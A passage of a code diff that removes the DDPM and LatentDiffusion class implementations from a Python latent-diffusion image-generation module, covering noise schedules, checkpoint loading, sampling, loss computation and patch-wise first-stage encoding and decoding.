- given_betas=None,
- original_elbo_weight=0.,
- v_posterior=0., # weight for choosing posterior variance as sigma = (1-v) * beta_tilde + v * beta
- l_simple_weight=1.,
- conditioning_key=None,
- parameterization="eps", # all assuming fixed variance schedules
- scheduler_config=None,
- use_positional_encodings=False,
- learn_logvar=False,
- logvar_init=0.,
- ):
- super().__init__()
- assert parameterization in ["eps", "x0"], 'currently only supporting "eps" and "x0"'
- self.parameterization = parameterization
- print(f"{self.__class__.__name__}: Running in {self.parameterization}-prediction mode")
- self.cond_stage_model = None
- self.clip_denoised = clip_denoised
- self.log_every_t = log_every_t
- self.first_stage_key = first_stage_key
- self.image_size = image_size # try conv?
- self.channels = channels
- self.use_positional_encodings = use_positional_encodings
- self.model = DiffusionWrapper(unet_config, conditioning_key)
- count_params(self.model, verbose=True)
- self.use_ema = use_ema
- if self.use_ema:
- self.model_ema = LitEma(self.model)
- print(f"Keeping EMAs of {len(list(self.model_ema.buffers()))}.")
-
- self.use_scheduler = scheduler_config is not None
- if self.use_scheduler:
- self.scheduler_config = scheduler_config
-
- self.v_posterior = v_posterior
- self.original_elbo_weight = original_elbo_weight
- self.l_simple_weight = l_simple_weight
-
- if monitor is not None:
- self.monitor = monitor
- if ckpt_path is not None:
- self.init_from_ckpt(ckpt_path, ignore_keys=ignore_keys, only_model=load_only_unet)
-
- self.register_schedule(given_betas=given_betas, beta_schedule=beta_schedule, timesteps=timesteps,
- linear_start=linear_start, linear_end=linear_end, cosine_s=cosine_s)
-
- self.loss_type = loss_type
-
- self.learn_logvar = learn_logvar
- self.logvar = torch.full(fill_value=logvar_init, size=(self.num_timesteps,))
- if self.learn_logvar:
- self.logvar = nn.Parameter(self.logvar, requires_grad=True)
-
-
- def register_schedule(self, given_betas=None, beta_schedule="linear", timesteps=1000,
- linear_start=1e-4, linear_end=2e-2, cosine_s=8e-3):
- if exists(given_betas):
- betas = given_betas
- else:
- betas = make_beta_schedule(beta_schedule, timesteps, linear_start=linear_start, linear_end=linear_end,
- cosine_s=cosine_s)
- alphas = 1. - betas
- alphas_cumprod = np.cumprod(alphas, axis=0)
- alphas_cumprod_prev = np.append(1., alphas_cumprod[:-1])
- alphas_cumprod_next = np.append(alphas_cumprod[1:], 0.0)
-
- timesteps, = betas.shape
- self.num_timesteps = int(timesteps)
- self.linear_start = linear_start
- self.linear_end = linear_end
- assert alphas_cumprod.shape[0] == self.num_timesteps, 'alphas have to be defined for each timestep'
-
- to_torch = partial(torch.tensor, dtype=torch.float32)
-
- self.register_buffer('betas', to_torch(betas))
- self.register_buffer('alphas_cumprod', to_torch(alphas_cumprod))
- self.register_buffer('alphas_cumprod_prev', to_torch(alphas_cumprod_prev))
- self.register_buffer('alphas_cumprod_next', to_torch(alphas_cumprod_next))
-
- # calculations for diffusion q(x_t | x_{t-1}) and others
- self.register_buffer('sqrt_alphas_cumprod', to_torch(np.sqrt(alphas_cumprod)))
- self.register_buffer('sqrt_one_minus_alphas_cumprod', to_torch(np.sqrt(1. - alphas_cumprod)))
- self.register_buffer('log_one_minus_alphas_cumprod', to_torch(np.log(1. - alphas_cumprod)))
- self.register_buffer('sqrt_recip_alphas_cumprod', to_torch(np.sqrt(1. / alphas_cumprod)))
- self.register_buffer('sqrt_recipm1_alphas_cumprod', to_torch(np.sqrt(1. / alphas_cumprod - 1)))
-
- # calculations for posterior q(x_{t-1} | x_t, x_0)
- posterior_variance = (1 - self.v_posterior) * betas * (1. - alphas_cumprod_prev) / (
- 1. - alphas_cumprod) + self.v_posterior * betas
- # above: equal to 1. / (1. / (1. - alpha_cumprod_tm1) + alpha_t / beta_t)
- self.register_buffer('posterior_variance', to_torch(posterior_variance))
- # below: log calculation clipped because the posterior variance is 0 at the beginning of the diffusion chain
- self.register_buffer('posterior_log_variance_clipped', to_torch(np.log(np.maximum(posterior_variance, 1e-20))))
- self.register_buffer('posterior_mean_coef1', to_torch(
- betas * np.sqrt(alphas_cumprod_prev) / (1. - alphas_cumprod)))
- self.register_buffer('posterior_mean_coef2', to_torch(
- (1. - alphas_cumprod_prev) * np.sqrt(alphas) / (1. - alphas_cumprod)))
-
- if self.parameterization == "eps":
- lvlb_weights = self.betas ** 2 / (
- 2 * self.posterior_variance * to_torch(alphas) * (1 - self.alphas_cumprod))
- elif self.parameterization == "x0":
- lvlb_weights = 0.5 * np.sqrt(torch.Tensor(alphas_cumprod)) / (2. * 1 - torch.Tensor(alphas_cumprod))
- else:
- raise NotImplementedError("mu not supported")
- # TODO how to choose this term
- lvlb_weights[0] = lvlb_weights[1]
- self.register_buffer('lvlb_weights', lvlb_weights, persistent=False)
- assert not torch.isnan(self.lvlb_weights).all()
-
- @contextmanager
- def ema_scope(self, context=None):
- if self.use_ema:
- self.model_ema.store(self.model.parameters())
- self.model_ema.copy_to(self.model)
- if context is not None:
- print(f"{context}: Switched to EMA weights")
- try:
- yield None
- finally:
- if self.use_ema:
- self.model_ema.restore(self.model.parameters())
- if context is not None:
- print(f"{context}: Restored training weights")
-
- def init_from_ckpt(self, path, ignore_keys=list(), only_model=False):
- sd = torch.load(path, map_location="cpu")
- if "state_dict" in list(sd.keys()):
- sd = sd["state_dict"]
- keys = list(sd.keys())
- for k in keys:
- for ik in ignore_keys:
- if k.startswith(ik):
- print("Deleting key {} from state_dict.".format(k))
- del sd[k]
- missing, unexpected = self.load_state_dict(sd, strict=False) if not only_model else self.model.load_state_dict(
- sd, strict=False)
- print(f"Restored from {path} with {len(missing)} missing and {len(unexpected)} unexpected keys")
- if len(missing) > 0:
- print(f"Missing Keys: {missing}")
- if len(unexpected) > 0:
- print(f"Unexpected Keys: {unexpected}")
-
- def q_mean_variance(self, x_start, t):
- """
- Get the distribution q(x_t | x_0).
- :param x_start: the [N x C x ...] tensor of noiseless inputs.
- :param t: the number of diffusion steps (minus 1). Here, 0 means one step.
- :return: A tuple (mean, variance, log_variance), all of x_start's shape.
- """
- mean = (extract_into_tensor(self.sqrt_alphas_cumprod, t, x_start.shape) * x_start)
- variance = extract_into_tensor(1.0 - self.alphas_cumprod, t, x_start.shape)
- log_variance = extract_into_tensor(self.log_one_minus_alphas_cumprod, t, x_start.shape)
- return mean, variance, log_variance
-
- def predict_start_from_noise(self, x_t, t, noise):
- return (
- extract_into_tensor(self.sqrt_recip_alphas_cumprod, t, x_t.shape) * x_t -
- extract_into_tensor(self.sqrt_recipm1_alphas_cumprod, t, x_t.shape) * noise
- )
-
- def q_posterior(self, x_start, x_t, t):
- posterior_mean = (
- extract_into_tensor(self.posterior_mean_coef1, t, x_t.shape) * x_start +
- extract_into_tensor(self.posterior_mean_coef2, t, x_t.shape) * x_t
- )
- posterior_variance = extract_into_tensor(self.posterior_variance, t, x_t.shape)
- posterior_log_variance_clipped = extract_into_tensor(self.posterior_log_variance_clipped, t, x_t.shape)
- return posterior_mean, posterior_variance, posterior_log_variance_clipped
-
- def p_mean_variance(self, x, t, clip_denoised: bool):
- model_out = self.model(x, t)
- if self.parameterization == "eps":
- x_recon = self.predict_start_from_noise(x, t=t, noise=model_out)
- elif self.parameterization == "x0":
- x_recon = model_out
- if clip_denoised:
- x_recon.clamp_(-1., 1.)
-
- model_mean, posterior_variance, posterior_log_variance = self.q_posterior(x_start=x_recon, x_t=x, t=t)
- return model_mean, posterior_variance, posterior_log_variance
-
- @torch.no_grad()
- def p_sample(self, x, t, clip_denoised=True, repeat_noise=False):
- b, *_, device = *x.shape, x.device
- model_mean, _, model_log_variance = self.p_mean_variance(x=x, t=t, clip_denoised=clip_denoised)
- noise = noise_like(x.shape, device, repeat_noise)
- # no noise when t == 0
- nonzero_mask = (1 - (t == 0).float()).reshape(b, *((1,) * (len(x.shape) - 1)))
- return model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise
-
- @torch.no_grad()
- def p_sample_loop(self, shape, return_intermediates=False):
- device = self.betas.device
- b = shape[0]
- img = torch.randn(shape, device=device)
- intermediates = [img]
- for i in tqdm(reversed(range(0, self.num_timesteps)), desc='Sampling t', total=self.num_timesteps):
- img = self.p_sample(img, torch.full((b,), i, device=device, dtype=torch.long),
- clip_denoised=self.clip_denoised)
- if i % self.log_every_t == 0 or i == self.num_timesteps - 1:
- intermediates.append(img)
- if return_intermediates:
- return img, intermediates
- return img
-
- @torch.no_grad()
- def sample(self, batch_size=16, return_intermediates=False):
- image_size = self.image_size
- channels = self.channels
- return self.p_sample_loop((batch_size, channels, image_size, image_size),
- return_intermediates=return_intermediates)
-
- def q_sample(self, x_start, t, noise=None):
- noise = default(noise, lambda: torch.randn_like(x_start))
- return (extract_into_tensor(self.sqrt_alphas_cumprod, t, x_start.shape) * x_start +
- extract_into_tensor(self.sqrt_one_minus_alphas_cumprod, t, x_start.shape) * noise)
-
- def get_loss(self, pred, target, mean=True):
- if self.loss_type == 'l1':
- loss = (target - pred).abs()
- if mean:
- loss = loss.mean()
- elif self.loss_type == 'l2':
- if mean:
- loss = torch.nn.functional.mse_loss(target, pred)
- else:
- loss = torch.nn.functional.mse_loss(target, pred, reduction='none')
- else:
- raise NotImplementedError("unknown loss type '{loss_type}'")
-
- return loss
-
- def p_losses(self, x_start, t, noise=None):
- noise = default(noise, lambda: torch.randn_like(x_start))
- x_noisy = self.q_sample(x_start=x_start, t=t, noise=noise)
- model_out = self.model(x_noisy, t)
-
- loss_dict = {}
- if self.parameterization == "eps":
- target = noise
- elif self.parameterization == "x0":
- target = x_start
- else:
- raise NotImplementedError(f"Paramterization {self.parameterization} not yet supported")
-
- loss = self.get_loss(model_out, target, mean=False).mean(dim=[1, 2, 3])
-
- log_prefix = 'train' if self.training else 'val'
-
- loss_dict.update({f'{log_prefix}/loss_simple': loss.mean()})
- loss_simple = loss.mean() * self.l_simple_weight
-
- loss_vlb = (self.lvlb_weights[t] * loss).mean()
- loss_dict.update({f'{log_prefix}/loss_vlb': loss_vlb})
-
- loss = loss_simple + self.original_elbo_weight * loss_vlb
-
- loss_dict.update({f'{log_prefix}/loss': loss})
-
- return loss, loss_dict
-
- def forward(self, x, *args, **kwargs):
- # b, c, h, w, device, img_size, = *x.shape, x.device, self.image_size
- # assert h == img_size and w == img_size, f'height and width of image must be {img_size}'
- t = torch.randint(0, self.num_timesteps, (x.shape[0],), device=self.device).long()
- return self.p_losses(x, t, *args, **kwargs)
-
- def get_input(self, batch, k):
- x = batch[k]
- if len(x.shape) == 3:
- x = x[..., None]
- x = rearrange(x, 'b h w c -> b c h w')
- x = x.to(memory_format=torch.contiguous_format).float()
- return x
-
- def shared_step(self, batch):
- x = self.get_input(batch, self.first_stage_key)
- loss, loss_dict = self(x)
- return loss, loss_dict
-
- def training_step(self, batch, batch_idx):
- loss, loss_dict = self.shared_step(batch)
-
- self.log_dict(loss_dict, prog_bar=True,
- logger=True, on_step=True, on_epoch=True)
-
- self.log("global_step", self.global_step,
- prog_bar=True, logger=True, on_step=True, on_epoch=False)
-
- if self.use_scheduler:
- lr = self.optimizers().param_groups[0]['lr']
- self.log('lr_abs', lr, prog_bar=True, logger=True, on_step=True, on_epoch=False)
-
- return loss
-
- @torch.no_grad()
- def validation_step(self, batch, batch_idx):
- _, loss_dict_no_ema = self.shared_step(batch)
- with self.ema_scope():
- _, loss_dict_ema = self.shared_step(batch)
- loss_dict_ema = {key + '_ema': loss_dict_ema[key] for key in loss_dict_ema}
- self.log_dict(loss_dict_no_ema, prog_bar=False, logger=True, on_step=False, on_epoch=True)
- self.log_dict(loss_dict_ema, prog_bar=False, logger=True, on_step=False, on_epoch=True)
-
- def on_train_batch_end(self, *args, **kwargs):
- if self.use_ema:
- self.model_ema(self.model)
-
- def _get_rows_from_list(self, samples):
- n_imgs_per_row = len(samples)
- denoise_grid = rearrange(samples, 'n b c h w -> b n c h w')
- denoise_grid = rearrange(denoise_grid, 'b n c h w -> (b n) c h w')
- denoise_grid = make_grid(denoise_grid, nrow=n_imgs_per_row)
- return denoise_grid
-
- @torch.no_grad()
- def log_images(self, batch, N=8, n_row=2, sample=True, return_keys=None, **kwargs):
- log = dict()
- x = self.get_input(batch, self.first_stage_key)
- N = min(x.shape[0], N)
- n_row = min(x.shape[0], n_row)
- x = x.to(self.device)[:N]
- log["inputs"] = x
-
- # get diffusion row
- diffusion_row = list()
- x_start = x[:n_row]
-
- for t in range(self.num_timesteps):
- if t % self.log_every_t == 0 or t == self.num_timesteps - 1:
- t = repeat(torch.tensor([t]), '1 -> b', b=n_row)
- t = t.to(self.device).long()
- noise = torch.randn_like(x_start)
- x_noisy = self.q_sample(x_start=x_start, t=t, noise=noise)
- diffusion_row.append(x_noisy)
-
- log["diffusion_row"] = self._get_rows_from_list(diffusion_row)
-
- if sample:
- # get denoise row
- with self.ema_scope("Plotting"):
- samples, denoise_row = self.sample(batch_size=N, return_intermediates=True)
-
- log["samples"] = samples
- log["denoise_row"] = self._get_rows_from_list(denoise_row)
-
- if return_keys:
- if np.intersect1d(list(log.keys()), return_keys).shape[0] == 0:
- return log
- else:
- return {key: log[key] for key in return_keys}
- return log
-
- def configure_optimizers(self):
- lr = self.learning_rate
- params = list(self.model.parameters())
- if self.learn_logvar:
- params = params + [self.logvar]
- opt = torch.optim.AdamW(params, lr=lr)
- return opt
-
-
-class LatentDiffusion(DDPM):
- """main class"""
- def __init__(self,
- first_stage_config,
- cond_stage_config,
- num_timesteps_cond=None,
- cond_stage_key="image",
- cond_stage_trainable=False,
- concat_mode=True,
- cond_stage_forward=None,
- conditioning_key=None,
- scale_factor=1.0,
- scale_by_std=False,
- *args, **kwargs):
- self.num_timesteps_cond = default(num_timesteps_cond, 1)
- self.scale_by_std = scale_by_std
- assert self.num_timesteps_cond <= kwargs['timesteps']
- # for backwards compatibility after implementation of DiffusionWrapper
- if conditioning_key is None:
- conditioning_key = 'concat' if concat_mode else 'crossattn'
- if cond_stage_config == '__is_unconditional__':
- conditioning_key = None
- ckpt_path = kwargs.pop("ckpt_path", None)
- ignore_keys = kwargs.pop("ignore_keys", [])
- super().__init__(conditioning_key=conditioning_key, *args, **kwargs)
- self.concat_mode = concat_mode
- self.cond_stage_trainable = cond_stage_trainable
- self.cond_stage_key = cond_stage_key
- try:
- self.num_downs = len(first_stage_config.params.ddconfig.ch_mult) - 1
- except:
- self.num_downs = 0
- if not scale_by_std:
- self.scale_factor = scale_factor
- else:
- self.register_buffer('scale_factor', torch.tensor(scale_factor))
- self.instantiate_first_stage(first_stage_config)
- self.instantiate_cond_stage(cond_stage_config)
- self.cond_stage_forward = cond_stage_forward
- self.clip_denoised = False
- self.bbox_tokenizer = None
-
- self.restarted_from_ckpt = False
- if ckpt_path is not None:
- self.init_from_ckpt(ckpt_path, ignore_keys)
- self.restarted_from_ckpt = True
-
- def make_cond_schedule(self, ):
- self.cond_ids = torch.full(size=(self.num_timesteps,), fill_value=self.num_timesteps - 1, dtype=torch.long)
- ids = torch.round(torch.linspace(0, self.num_timesteps - 1, self.num_timesteps_cond)).long()
- self.cond_ids[:self.num_timesteps_cond] = ids
-
- @rank_zero_only
- @torch.no_grad()
- def on_train_batch_start(self, batch, batch_idx, dataloader_idx):
- # only for very first batch
- if self.scale_by_std and self.current_epoch == 0 and self.global_step == 0 and batch_idx == 0 and not self.restarted_from_ckpt:
- assert self.scale_factor == 1., 'rather not use custom rescaling and std-rescaling simultaneously'
- # set rescale weight to 1./std of encodings
- print("### USING STD-RESCALING ###")
- x = super().get_input(batch, self.first_stage_key)
- x = x.to(self.device)
- encoder_posterior = self.encode_first_stage(x)
- z = self.get_first_stage_encoding(encoder_posterior).detach()
- del self.scale_factor
- self.register_buffer('scale_factor', 1. / z.flatten().std())
- print(f"setting self.scale_factor to {self.scale_factor}")
- print("### USING STD-RESCALING ###")
-
- def register_schedule(self,
- given_betas=None, beta_schedule="linear", timesteps=1000,
- linear_start=1e-4, linear_end=2e-2, cosine_s=8e-3):
- super().register_schedule(given_betas, beta_schedule, timesteps, linear_start, linear_end, cosine_s)
-
- self.shorten_cond_schedule = self.num_timesteps_cond > 1
- if self.shorten_cond_schedule:
- self.make_cond_schedule()
-
- def instantiate_first_stage(self, config):
- model = instantiate_from_config(config)
- self.first_stage_model = model.eval()
- self.first_stage_model.train = disabled_train
- for param in self.first_stage_model.parameters():
- param.requires_grad = False
-
- def instantiate_cond_stage(self, config):
- if not self.cond_stage_trainable:
- if config == "__is_first_stage__":
- print("Using first stage also as cond stage.")
- self.cond_stage_model = self.first_stage_model
- elif config == "__is_unconditional__":
- print(f"Training {self.__class__.__name__} as an unconditional model.")
- self.cond_stage_model = None
- # self.be_unconditional = True
- else:
- model = instantiate_from_config(config)
- self.cond_stage_model = model.eval()
- self.cond_stage_model.train = disabled_train
- for param in self.cond_stage_model.parameters():
- param.requires_grad = False
- else:
- assert config != '__is_first_stage__'
- assert config != '__is_unconditional__'
- model = instantiate_from_config(config)
- self.cond_stage_model = model
-
- def _get_denoise_row_from_list(self, samples, desc='', force_no_decoder_quantization=False):
- denoise_row = []
- for zd in tqdm(samples, desc=desc):
- denoise_row.append(self.decode_first_stage(zd.to(self.device),
- force_not_quantize=force_no_decoder_quantization))
- n_imgs_per_row = len(denoise_row)
- denoise_row = torch.stack(denoise_row) # n_log_step, n_row, C, H, W
- denoise_grid = rearrange(denoise_row, 'n b c h w -> b n c h w')
- denoise_grid = rearrange(denoise_grid, 'b n c h w -> (b n) c h w')
- denoise_grid = make_grid(denoise_grid, nrow=n_imgs_per_row)
- return denoise_grid
-
- def get_first_stage_encoding(self, encoder_posterior):
- if isinstance(encoder_posterior, DiagonalGaussianDistribution):
- z = encoder_posterior.sample()
- elif isinstance(encoder_posterior, torch.Tensor):
- z = encoder_posterior
- else:
- raise NotImplementedError(f"encoder_posterior of type '{type(encoder_posterior)}' not yet implemented")
- return self.scale_factor * z
-
- def get_learned_conditioning(self, c):
- if self.cond_stage_forward is None:
- if hasattr(self.cond_stage_model, 'encode') and callable(self.cond_stage_model.encode):
- c = self.cond_stage_model.encode(c)
- if isinstance(c, DiagonalGaussianDistribution):
- c = c.mode()
- else:
- c = self.cond_stage_model(c)
- else:
- assert hasattr(self.cond_stage_model, self.cond_stage_forward)
- c = getattr(self.cond_stage_model, self.cond_stage_forward)(c)
- return c
-
- def meshgrid(self, h, w):
- y = torch.arange(0, h).view(h, 1, 1).repeat(1, w, 1)
- x = torch.arange(0, w).view(1, w, 1).repeat(h, 1, 1)
-
- arr = torch.cat([y, x], dim=-1)
- return arr
-
- def delta_border(self, h, w):
- """
- :param h: height
- :param w: width
- :return: normalized distance to image border,
- wtith min distance = 0 at border and max dist = 0.5 at image center
- """
- lower_right_corner = torch.tensor([h - 1, w - 1]).view(1, 1, 2)
- arr = self.meshgrid(h, w) / lower_right_corner
- dist_left_up = torch.min(arr, dim=-1, keepdims=True)[0]
- dist_right_down = torch.min(1 - arr, dim=-1, keepdims=True)[0]
- edge_dist = torch.min(torch.cat([dist_left_up, dist_right_down], dim=-1), dim=-1)[0]
- return edge_dist
-
- def get_weighting(self, h, w, Ly, Lx, device):
- weighting = self.delta_border(h, w)
- weighting = torch.clip(weighting, self.split_input_params["clip_min_weight"],
- self.split_input_params["clip_max_weight"], )
- weighting = weighting.view(1, h * w, 1).repeat(1, 1, Ly * Lx).to(device)
-
- if self.split_input_params["tie_braker"]:
- L_weighting = self.delta_border(Ly, Lx)
- L_weighting = torch.clip(L_weighting,
- self.split_input_params["clip_min_tie_weight"],
- self.split_input_params["clip_max_tie_weight"])
-
- L_weighting = L_weighting.view(1, 1, Ly * Lx).to(device)
- weighting = weighting * L_weighting
- return weighting
-
- def get_fold_unfold(self, x, kernel_size, stride, uf=1, df=1): # todo load once not every time, shorten code
- """
- :param x: img of size (bs, c, h, w)
- :return: n img crops of size (n, bs, c, kernel_size[0], kernel_size[1])
- """
- bs, nc, h, w = x.shape
-
- # number of crops in image
- Ly = (h - kernel_size[0]) // stride[0] + 1
- Lx = (w - kernel_size[1]) // stride[1] + 1
-
- if uf == 1 and df == 1:
- fold_params = dict(kernel_size=kernel_size, dilation=1, padding=0, stride=stride)
- unfold = torch.nn.Unfold(**fold_params)
-
- fold = torch.nn.Fold(output_size=x.shape[2:], **fold_params)
-
- weighting = self.get_weighting(kernel_size[0], kernel_size[1], Ly, Lx, x.device).to(x.dtype)
- normalization = fold(weighting).view(1, 1, h, w) # normalizes the overlap
- weighting = weighting.view((1, 1, kernel_size[0], kernel_size[1], Ly * Lx))
-
- elif uf > 1 and df == 1:
- fold_params = dict(kernel_size=kernel_size, dilation=1, padding=0, stride=stride)
- unfold = torch.nn.Unfold(**fold_params)
-
- fold_params2 = dict(kernel_size=(kernel_size[0] * uf, kernel_size[0] * uf),
- dilation=1, padding=0,
- stride=(stride[0] * uf, stride[1] * uf))
- fold = torch.nn.Fold(output_size=(x.shape[2] * uf, x.shape[3] * uf), **fold_params2)
-
- weighting = self.get_weighting(kernel_size[0] * uf, kernel_size[1] * uf, Ly, Lx, x.device).to(x.dtype)
- normalization = fold(weighting).view(1, 1, h * uf, w * uf) # normalizes the overlap
- weighting = weighting.view((1, 1, kernel_size[0] * uf, kernel_size[1] * uf, Ly * Lx))
-
- elif df > 1 and uf == 1:
- fold_params = dict(kernel_size=kernel_size, dilation=1, padding=0, stride=stride)
- unfold = torch.nn.Unfold(**fold_params)
-
- fold_params2 = dict(kernel_size=(kernel_size[0] // df, kernel_size[0] // df),
- dilation=1, padding=0,
- stride=(stride[0] // df, stride[1] // df))
- fold = torch.nn.Fold(output_size=(x.shape[2] // df, x.shape[3] // df), **fold_params2)
-
- weighting = self.get_weighting(kernel_size[0] // df, kernel_size[1] // df, Ly, Lx, x.device).to(x.dtype)
- normalization = fold(weighting).view(1, 1, h // df, w // df) # normalizes the overlap
- weighting = weighting.view((1, 1, kernel_size[0] // df, kernel_size[1] // df, Ly * Lx))
-
- else:
- raise NotImplementedError
-
- return fold, unfold, normalization, weighting
-
- @torch.no_grad()
- def get_input(self, batch, k, return_first_stage_outputs=False, force_c_encode=False,
- cond_key=None, return_original_cond=False, bs=None):
- x = super().get_input(batch, k)
- if bs is not None:
- x = x[:bs]
- x = x.to(self.device)
- encoder_posterior = self.encode_first_stage(x)
- z = self.get_first_stage_encoding(encoder_posterior).detach()
-
- if self.model.conditioning_key is not None:
- if cond_key is None:
- cond_key = self.cond_stage_key
- if cond_key != self.first_stage_key:
- if cond_key in ['caption', 'coordinates_bbox']:
- xc = batch[cond_key]
- elif cond_key == 'class_label':
- xc = batch
- else:
- xc = super().get_input(batch, cond_key).to(self.device)
- else:
- xc = x
- if not self.cond_stage_trainable or force_c_encode:
- if isinstance(xc, dict) or isinstance(xc, list):
- # import pudb; pudb.set_trace()
- c = self.get_learned_conditioning(xc)
- else:
- c = self.get_learned_conditioning(xc.to(self.device))
- else:
- c = xc
- if bs is not None:
- c = c[:bs]
-
- if self.use_positional_encodings:
- pos_x, pos_y = self.compute_latent_shifts(batch)
- ckey = __conditioning_keys__[self.model.conditioning_key]
- c = {ckey: c, 'pos_x': pos_x, 'pos_y': pos_y}
-
- else:
- c = None
- xc = None
- if self.use_positional_encodings:
- pos_x, pos_y = self.compute_latent_shifts(batch)
- c = {'pos_x': pos_x, 'pos_y': pos_y}
- out = [z, c]
- if return_first_stage_outputs:
- xrec = self.decode_first_stage(z)
- out.extend([x, xrec])
- if return_original_cond:
- out.append(xc)
- return out
-
- @torch.no_grad()
- def decode_first_stage(self, z, predict_cids=False, force_not_quantize=False):
- if predict_cids:
- if z.dim() == 4:
- z = torch.argmax(z.exp(), dim=1).long()
- z = self.first_stage_model.quantize.get_codebook_entry(z, shape=None)
- z = rearrange(z, 'b h w c -> b c h w').contiguous()
-
- z = 1. / self.scale_factor * z
-
- if hasattr(self, "split_input_params"):
- if self.split_input_params["patch_distributed_vq"]:
- ks = self.split_input_params["ks"] # eg. (128, 128)
- stride = self.split_input_params["stride"] # eg. (64, 64)
- uf = self.split_input_params["vqf"]
- bs, nc, h, w = z.shape
- if ks[0] > h or ks[1] > w:
- ks = (min(ks[0], h), min(ks[1], w))
- print("reducing Kernel")
-
- if stride[0] > h or stride[1] > w:
- stride = (min(stride[0], h), min(stride[1], w))
- print("reducing stride")
-
- fold, unfold, normalization, weighting = self.get_fold_unfold(z, ks, stride, uf=uf)
-
- z = unfold(z) # (bn, nc * prod(**ks), L)
- # 1. Reshape to img shape
- z = z.view((z.shape[0], -1, ks[0], ks[1], z.shape[-1])) # (bn, nc, ks[0], ks[1], L )
-
- # 2. apply model loop over last dim
- if isinstance(self.first_stage_model, VQModelInterface):
- output_list = [self.first_stage_model.decode(z[:, :, :, :, i],
- force_not_quantize=predict_cids or force_not_quantize)
- for i in range(z.shape[-1])]
- else:
-
- output_list = [self.first_stage_model.decode(z[:, :, :, :, i])
- for i in range(z.shape[-1])]
-
- o = torch.stack(output_list, axis=-1) # # (bn, nc, ks[0], ks[1], L)
- o = o * weighting
- # Reverse 1. reshape to img shape
- o = o.view((o.shape[0], -1, o.shape[-1])) # (bn, nc * ks[0] * ks[1], L)
- # stitch crops together
- decoded = fold(o)
- decoded = decoded / normalization # norm is shape (1, 1, h, w)
- return decoded
- else:
- if isinstance(self.first_stage_model, VQModelInterface):
- return self.first_stage_model.decode(z, force_not_quantize=predict_cids or force_not_quantize)
- else:
- return self.first_stage_model.decode(z)
-
- else:
- if isinstance(self.first_stage_model, VQModelInterface):
- return self.first_stage_model.decode(z, force_not_quantize=predict_cids or force_not_quantize)
- else:
- return self.first_stage_model.decode(z)
-
- # same as above but without decorator
- def differentiable_decode_first_stage(self, z, predict_cids=False, force_not_quantize=False):
- if predict_cids:
- if z.dim() == 4:
- z = torch.argmax(z.exp(), dim=1).long()
- z = self.first_stage_model.quantize.get_codebook_entry(z, shape=None)
- z = rearrange(z, 'b h w c -> b c h w').contiguous()
-
- z = 1. / self.scale_factor * z
-
- if hasattr(self, "split_input_params"):
- if self.split_input_params["patch_distributed_vq"]:
- ks = self.split_input_params["ks"] # eg. (128, 128)
- stride = self.split_input_params["stride"] # eg. (64, 64)
- uf = self.split_input_params["vqf"]
- bs, nc, h, w = z.shape
- if ks[0] > h or ks[1] > w:
- ks = (min(ks[0], h), min(ks[1], w))
- print("reducing Kernel")
-
- if stride[0] > h or stride[1] > w:
- stride = (min(stride[0], h), min(stride[1], w))
- print("reducing stride")
-
- fold, unfold, normalization, weighting = self.get_fold_unfold(z, ks, stride, uf=uf)
-
- z = unfold(z) # (bn, nc * prod(**ks), L)
- # 1. Reshape to img shape
- z = z.view((z.shape[0], -1, ks[0], ks[1], z.shape[-1])) # (bn, nc, ks[0], ks[1], L )
-
- # 2. apply model loop over last dim
- if isinstance(self.first_stage_model, VQModelInterface):
- output_list = [self.first_stage_model.decode(z[:, :, :, :, i],
- force_not_quantize=predict_cids or force_not_quantize)
- for i in range(z.shape[-1])]
- else:
-
- output_list = [self.first_stage_model.decode(z[:, :, :, :, i])
- for i in range(z.shape[-1])]
-
- o = torch.stack(output_list, axis=-1) # # (bn, nc, ks[0], ks[1], L)
- o = o * weighting
- # Reverse 1. reshape to img shape
- o = o.view((o.shape[0], -1, o.shape[-1])) # (bn, nc * ks[0] * ks[1], L)
- # stitch crops together
- decoded = fold(o)
- decoded = decoded / normalization # norm is shape (1, 1, h, w)
- return decoded
- else:
- if isinstance(self.first_stage_model, VQModelInterface):
- return self.first_stage_model.decode(z, force_not_quantize=predict_cids or force_not_quantize)
- else:
- return self.first_stage_model.decode(z)
-
- else:
- if isinstance(self.first_stage_model, VQModelInterface):
- return self.first_stage_model.decode(z, force_not_quantize=predict_cids or force_not_quantize)
- else:
- return self.first_stage_model.decode(z)
-
- @torch.no_grad()
- def encode_first_stage(self, x):
- if hasattr(self, "split_input_params"):
- if self.split_input_params["patch_distributed_vq"]:
- ks = self.split_input_params["ks"] # eg. (128, 128)
- stride = self.split_input_params["stride"] # eg. (64, 64)
- df = self.split_input_params["vqf"]
- self.split_input_params['original_image_size'] = x.shape[-2:]
- bs, nc, h, w = x.shape
- if ks[0] > h or ks[1] > w:
- ks = (min(ks[0], h), min(ks[1], w))
- print("reducing Kernel")
-
- if stride[0] > h or stride[1] > w:
- stride = (min(stride[0], h), min(stride[1], w))
- print("reducing stride")
-
- fold, unfold, normalization, weighting = self.get_fold_unfold(x, ks, stride, df=df)
- z = unfold(x) # (bn, nc * prod(**ks), L)
- # Reshape to img shape
- z = z.view((z.shape[0], -1, ks[0], ks[1], z.shape[-1])) # (bn, nc, ks[0], ks[1], L )
-
- output_list = [self.first_stage_model.encode(z[:, :, :, :, i])
- for i in range(z.shape[-1])]
-
- o = torch.stack(output_list, axis=-1)
- o = o * weighting
-
- # Reverse reshape to img shape
- o = o.view((o.shape[0], -1, o.shape[-1])) # (bn, nc * ks[0] * ks[1], L)
- # stitch crops together
- decoded = fold(o)
- decoded = decoded / normalization
- return decoded
-
- else:
- return self.first_stage_model.encode(x)
- else:
- return self.first_stage_model.encode(x)
-
- def shared_step(self, batch, **kwargs):
- x, c = self.get_input(batch, self.first_stage_key)
- loss = self(x, c)
- return loss
-
- def forward(self, x, c, *args, **kwargs):
- t = torch.randint(0, self.num_timesteps, (x.shape[0],), device=self.device).long()
- if self.model.conditioning_key is not None:
- assert c is not None
- if self.cond_stage_trainable:
- c = self.get_learned_conditioning(c)
- if self.shorten_cond_schedule: # TODO: drop this option
- tc = self.cond_ids[t].to(self.device)
- c = self.q_sample(x_start=c, t=tc, noise=torch.randn_like(c.float()))
- return self.p_losses(x, c, t, *args, **kwargs)
-
- def _rescale_annotations(self, bboxes, crop_coordinates): # TODO: move to dataset
- def rescale_bbox(bbox):
- x0 = clamp((bbox[0] - crop_coordinates[0]) / crop_coordinates[2])
- y0 = clamp((bbox[1] - crop_coordinates[1]) / crop_coordinates[3])
